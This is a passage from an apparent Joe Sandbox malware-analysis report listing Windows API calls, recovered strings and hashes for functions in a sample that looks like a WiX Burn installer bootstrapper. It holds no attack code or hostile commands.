                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharErrorLastMultiWide
                                                                                                                • String ID: comres.dll
                                                                                                                • API String ID: 203985260-246242247
                                                                                                                • Opcode ID: b07c505b2f6912a77ae5e9638eaf26179da05f6ef2b7496691478e5f69df2bb6
                                                                                                                • Instruction ID: ff294ac48a882d9b1d0378bc3f72c850c920774779381cdebe90caf6d55038af
                                                                                                                • Opcode Fuzzy Hash: b07c505b2f6912a77ae5e9638eaf26179da05f6ef2b7496691478e5f69df2bb6
                                                                                                                • Instruction Fuzzy Hash: 5F310935680319ABCB21AF58C885BAB7BACEF91764F14C06BF8148B391DB70CD04D7A1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E8E44: lstrlenW.KERNEL32(00000100,?,?,?,009E9217,000002C0,00000100,00000100,00000100,?,?,?,009C7D87,?,?,000001BC), ref: 009E8E69
                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,009EB500,wininet.dll,?), ref: 009E907A
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,009EB500,wininet.dll,?), ref: 009E9087
                                                                                                                  • Part of subcall function 009E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A0AAA0,00000000,?,009E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009E0F80
                                                                                                                  • Part of subcall function 009E0E4F: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,009C8E1B), ref: 009E0EAA
                                                                                                                  • Part of subcall function 009E0E4F: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009C8E1B,00000000), ref: 009E0EC8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$EnumInfoOpenQuerylstrlen
                                                                                                                • String ID: wininet.dll
                                                                                                                • API String ID: 2680864210-3354682871
                                                                                                                • Opcode ID: 1187822c5624f682ac5611a86e097e769ffb551ce225de3b653cda19c40d8a22
                                                                                                                • Instruction ID: 9a0bb70a528db45456aea929f793a0c3cfa79b9ec59783307144f8a9e94fd7ae
                                                                                                                • Opcode Fuzzy Hash: 1187822c5624f682ac5611a86e097e769ffb551ce225de3b653cda19c40d8a22
                                                                                                                • Instruction Fuzzy Hash: 41313B32C011ADEFCF22AFD6CD409AEBB79EF84711B914179EA0476121C7318E50DB90
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E8E44: lstrlenW.KERNEL32(00000100,?,?,?,009E9217,000002C0,00000100,00000100,00000100,?,?,?,009C7D87,?,?,000001BC), ref: 009E8E69
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 009E9483
                                                                                                                • RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000,00000000,?), ref: 009E949D
                                                                                                                  • Part of subcall function 009E0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,009B061A,?,00000000,00020006), ref: 009E0C0E
                                                                                                                  • Part of subcall function 009E14F4: RegSetValueExW.ADVAPI32(00020006,009F0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,009AF335,00000000,?,00020006), ref: 009E1527
                                                                                                                  • Part of subcall function 009E14F4: RegDeleteValueW.ADVAPI32(00020006,009F0D10,00000000,?,?,009AF335,00000000,?,00020006,?,009F0D10,00020006,00000000,?,?,?), ref: 009E1557
                                                                                                                  • Part of subcall function 009E14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,009AF28D,009F0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 009E14BB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$Close$CreateDeletelstrlen
                                                                                                                • String ID: %ls\%ls
                                                                                                                • API String ID: 3924016894-2125769799
                                                                                                                • Opcode ID: da4de53fc49c1581f1754ced598738eb83a41b5fdc9a88b5c3e6f34040185893
                                                                                                                • Instruction ID: 675a307dec2bb6dcc9a1d8f1a41ceabcad6c691d772c89d5d0c16e440da2533d
                                                                                                                • Opcode Fuzzy Hash: da4de53fc49c1581f1754ced598738eb83a41b5fdc9a88b5c3e6f34040185893
                                                                                                                • Instruction Fuzzy Hash: 63311C72C011ADBFCF129FD6CC4199EBB79EB44750B054166F904A6221E7318E11EB90
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memcpy_s
                                                                                                                • String ID: crypt32.dll$wininet.dll
                                                                                                                • API String ID: 2001391462-82500532
                                                                                                                • Opcode ID: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
                                                                                                                • Instruction ID: c3d815c58ebb4135faa944f204b7e1d39fa86a8d5ac1f403ca5795597edabb99
                                                                                                                • Opcode Fuzzy Hash: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
                                                                                                                • Instruction Fuzzy Hash: A4115E71700219ABCB08DE59CD95AABBF6DEF95394B14802AFC058B311D271EA10CAE0
                                                                                                                APIs
                                                                                                                • RegSetValueExW.ADVAPI32(00020006,009F0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,009AF335,00000000,?,00020006), ref: 009E1527
                                                                                                                • RegDeleteValueW.ADVAPI32(00020006,009F0D10,00000000,?,?,009AF335,00000000,?,00020006,?,009F0D10,00020006,00000000,?,?,?), ref: 009E1557
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$Delete
                                                                                                                • String ID: regutil.cpp
                                                                                                                • API String ID: 1738766685-955085611
                                                                                                                • Opcode ID: c6115a88d450500be8ff02d73b15b7787a1030355ae956f25f483d8288527f8a
                                                                                                                • Instruction ID: 3aca65c7b83947c4c06cfdb61e113d1d3dee13b574b3557d00ee320586b3cdef
                                                                                                                • Opcode Fuzzy Hash: c6115a88d450500be8ff02d73b15b7787a1030355ae956f25f483d8288527f8a
                                                                                                                • Instruction Fuzzy Hash: 4E110636D112BAB7DB238A968C05BAA7A28AB44760F150225BD02AA190DF31CD2097E0
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,009C7691,00000000,IGNOREDEPENDENCIES,00000000,?,009EB518), ref: 009ADE04
                                                                                                                Strings
                                                                                                                • IGNOREDEPENDENCIES, xrefs: 009ADDBB
                                                                                                                • Failed to copy the property value., xrefs: 009ADE38
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareString
                                                                                                                • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
                                                                                                                • API String ID: 1825529933-1412343224
                                                                                                                • Opcode ID: 510c2d6519862fbe77d4728fddb6fc3d90890ef2b4f009f8e5afe435d3b033e5
                                                                                                                • Instruction ID: 3a2bb5059accd621da949b79095d960ea5d20544ff472e7fd739e91e3fe89ce7
                                                                                                                • Opcode Fuzzy Hash: 510c2d6519862fbe77d4728fddb6fc3d90890ef2b4f009f8e5afe435d3b033e5
                                                                                                                • Instruction Fuzzy Hash: D311E332205215AFCB115F54CC84FAA77AAAF96324F314165FA1A9FA91C7719C50C7C0
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,009B8E97,?,00000001,20000004,00000000,00000000,?,00000000), ref: 009E566E
                                                                                                                • SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009B8E97,?), ref: 009E5689
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoNamedSecuritySleep
                                                                                                                • String ID: aclutil.cpp
                                                                                                                • API String ID: 2352087905-2159165307
                                                                                                                • Opcode ID: 3590da621fe69a5a4d78a35a089f76adac894dd0f756ab381d9a1f86294c344e
                                                                                                                • Instruction ID: 8792e7e304b9f2ace24dbf2c1311a1b15658055d511c6d8c65937650627b4971
                                                                                                                • Opcode Fuzzy Hash: 3590da621fe69a5a4d78a35a089f76adac894dd0f756ab381d9a1f86294c344e
                                                                                                                • Instruction Fuzzy Hash: D2015E33801569BBCF239F8ACD05E9E7B69EF84B68F064155FD046A120C6329D20ABD0
                                                                                                                APIs
                                                                                                                • LCMapStringW.KERNEL32(0000007F,00000000,00000000,009B70E8,00000000,009B70E8,00000000,00000000,009B70E8,00000000,00000000,00000000,?,009A2318,00000000,00000000), ref: 009A15D0
                                                                                                                • GetLastError.KERNEL32(?,009A2318,00000000,00000000,009B70E8,00000200,?,009E52B2,00000000,009B70E8,00000000,009B70E8,00000000,00000000,00000000), ref: 009A15DA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastString
                                                                                                                • String ID: strutil.cpp
                                                                                                                • API String ID: 3728238275-3612885251
                                                                                                                • Opcode ID: 0bdfa4dad302db180fa4c189697207f3324b8ac9f77c45718167c23bd78c2162
                                                                                                                • Instruction ID: 87a861b47f695fe607f29166b5dc96d5985d1faf4e2c7aa3105100ec8e10dd4e
                                                                                                                • Opcode Fuzzy Hash: 0bdfa4dad302db180fa4c189697207f3324b8ac9f77c45718167c23bd78c2162
                                                                                                                • Instruction Fuzzy Hash: 4A017133D4567A778B219E998C44E5B7A6DEF86B71F094224FE14AF250D620DC1097E0
                                                                                                                APIs
                                                                                                                • CoInitializeEx.OLE32(00000000,00000000), ref: 009B57D9
                                                                                                                • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 009B5833
                                                                                                                Strings
                                                                                                                • Failed to initialize COM on cache thread., xrefs: 009B57E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeUninitialize
                                                                                                                • String ID: Failed to initialize COM on cache thread.
                                                                                                                • API String ID: 3442037557-3629645316
                                                                                                                • Opcode ID: b6d3a6c357204f6932b0b6d3efe228fdf25a38376b7ca2c96cfecd7ba1ba03a8
                                                                                                                • Instruction ID: e67515d8bcba54c089cf7465c3429e5efbbb8d09650ef2f8712439404ffdb69d
                                                                                                                • Opcode Fuzzy Hash: b6d3a6c357204f6932b0b6d3efe228fdf25a38376b7ca2c96cfecd7ba1ba03a8
                                                                                                                • Instruction Fuzzy Hash: 49016172601619BFC7059FA5D884ED6FBACFF48354B118125F609C7111DB31AD54DBD0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A0AAA0,00000000,?,009E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009E0F80
                                                                                                                • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,009E3A8E,?), ref: 009E3C62
                                                                                                                Strings
                                                                                                                • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 009E3C0C
                                                                                                                • EnableLUA, xrefs: 009E3C34
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen
                                                                                                                • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                • API String ID: 47109696-3551287084
                                                                                                                • Opcode ID: aa0051ae5dcba66e3aeb20c8a4fbbcba804b88405f0e31f99c101cedcf90172d
                                                                                                                • Instruction ID: 79574a36079c32a733cdc6552d60a0881f743d39d94844d489d161e58a8bc3a5
                                                                                                                • Opcode Fuzzy Hash: aa0051ae5dcba66e3aeb20c8a4fbbcba804b88405f0e31f99c101cedcf90172d
                                                                                                                • Instruction Fuzzy Hash: 6301DF32810228FBC7229AA6D80ABEEF7ACEB04722F3085A4AC40B3041D3759F50D6D0
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,009A1104,?,?,00000000), ref: 009A5142
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,009A1104,?,?,00000000), ref: 009A5172
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareStringlstrlen
                                                                                                                • String ID: burn.clean.room
                                                                                                                • API String ID: 1433953587-3055529264
                                                                                                                • Opcode ID: a36f0e14bb35f50068df29ac78461d0f41f230bfe07c1bd06c894f6425f93cdf
                                                                                                                • Instruction ID: 94ec11c7f8e43acf02e10c53eb54de154e0f66f585105b8a2ae01566d8755807
                                                                                                                • Opcode Fuzzy Hash: a36f0e14bb35f50068df29ac78461d0f41f230bfe07c1bd06c894f6425f93cdf
                                                                                                                • Instruction Fuzzy Hash: 550162B2B096246FC7308B999D84A73B7BCE7667A0B114116F505C7660D370DC42C6E1
                                                                                                                APIs
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E6985
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeString
                                                                                                                • String ID: `<u$atomutil.cpp
                                                                                                                • API String ID: 3341692771-4051019476
                                                                                                                • Opcode ID: c74f3cecf42a28f39218847770ed2a6f2a08bac66019a3b0b7e8e114b1fef295
                                                                                                                • Instruction ID: 6e4834213414a1ff28e8a494383debdbfc35319ab1fcfed079a62be5dfc67cd2
                                                                                                                • Opcode Fuzzy Hash: c74f3cecf42a28f39218847770ed2a6f2a08bac66019a3b0b7e8e114b1fef295
                                                                                                                • Instruction Fuzzy Hash: 2E01F432800158FBC7236A9ADC02BAEF77CAFA5BA0F244165F80067152C7766E00E6E0
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 009A6534
                                                                                                                  • Part of subcall function 009E0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,009A5EB2,00000000), ref: 009E0AE0
                                                                                                                  • Part of subcall function 009E0ACC: GetProcAddress.KERNEL32(00000000), ref: 009E0AE7
                                                                                                                  • Part of subcall function 009E0ACC: GetLastError.KERNEL32(?,?,?,009A5EB2,00000000), ref: 009E0AFE
                                                                                                                  • Part of subcall function 009A5CE2: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 009A5D68
                                                                                                                Strings
                                                                                                                • Failed to set variant value., xrefs: 009A6571
                                                                                                                • Failed to get 64-bit folder., xrefs: 009A6557
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                • String ID: Failed to get 64-bit folder.$Failed to set variant value.
                                                                                                                • API String ID: 3109562764-2681622189
                                                                                                                • Opcode ID: 8e63698e50c4a0222099a60f15f5fd7aa58762e92574c1628b8ec300e6d34f0a
                                                                                                                • Instruction ID: ef9df349fe08d6ad40b9415c7941c913ed2b806551cb03245297bf4e08084b07
                                                                                                                • Opcode Fuzzy Hash: 8e63698e50c4a0222099a60f15f5fd7aa58762e92574c1628b8ec300e6d34f0a
                                                                                                                • Instruction Fuzzy Hash: 00016D32D0126CBBCF22ABA5CD06A9EBB78EF41B21F154156F800AA155E6719F50DBD0
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,009A10DD,?,00000000), ref: 009A33E8
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,009A10DD,?,00000000), ref: 009A33FF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                • String ID: pathutil.cpp
                                                                                                                • API String ID: 2776309574-741606033
                                                                                                                • Opcode ID: 1166d36f27ed3910e43d8872e984cbe1a68b608fc3166e98cf5b790d9a4eb01d
                                                                                                                • Instruction ID: f5e89c80b0dfbdf95189211cd51bbc057512faf2f58bb5163dc5a7abc5b11755
                                                                                                                • Opcode Fuzzy Hash: 1166d36f27ed3910e43d8872e984cbe1a68b608fc3166e98cf5b790d9a4eb01d
                                                                                                                • Instruction Fuzzy Hash: 7AF0F673A4963567C73256975C45E9BFA9CEB87B70B528121FE04BF120DB64DD0082E0
                                                                                                                APIs
                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 009CEBD2
                                                                                                                  • Part of subcall function 009D1380: RaiseException.KERNEL32(?,?,?,009CEBF4,?,00000000,00000000,?,?,?,?,?,009CEBF4,?,00A07EC8), ref: 009D13DF
                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 009CEBEF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                • String ID: Unknown exception
                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                • Opcode ID: 2a049d69fdd46f9bf71cd37a3ccdc29c96b7937aa1967315cade5730e75f1f31
                                                                                                                • Instruction ID: 2f619aaa1dca025511466ae13d46a783e234f2d8b418b78a885006496703f3a5
                                                                                                                • Opcode Fuzzy Hash: 2a049d69fdd46f9bf71cd37a3ccdc29c96b7937aa1967315cade5730e75f1f31
                                                                                                                • Instruction Fuzzy Hash: 18F02235C0020DBBCB00BAA5E84AFAC732C5E40340B90896AF817925C1EB30FE15C5C2
                                                                                                                APIs
                                                                                                                • GetFileSizeEx.KERNEL32(00000000,00000000,00000000,74DF34C0,?,?,?,009ABA1D,?,?,?,00000000,00000000), ref: 009E4A1D
                                                                                                                • GetLastError.KERNEL32(?,?,?,009ABA1D,?,?,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009E4A27
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
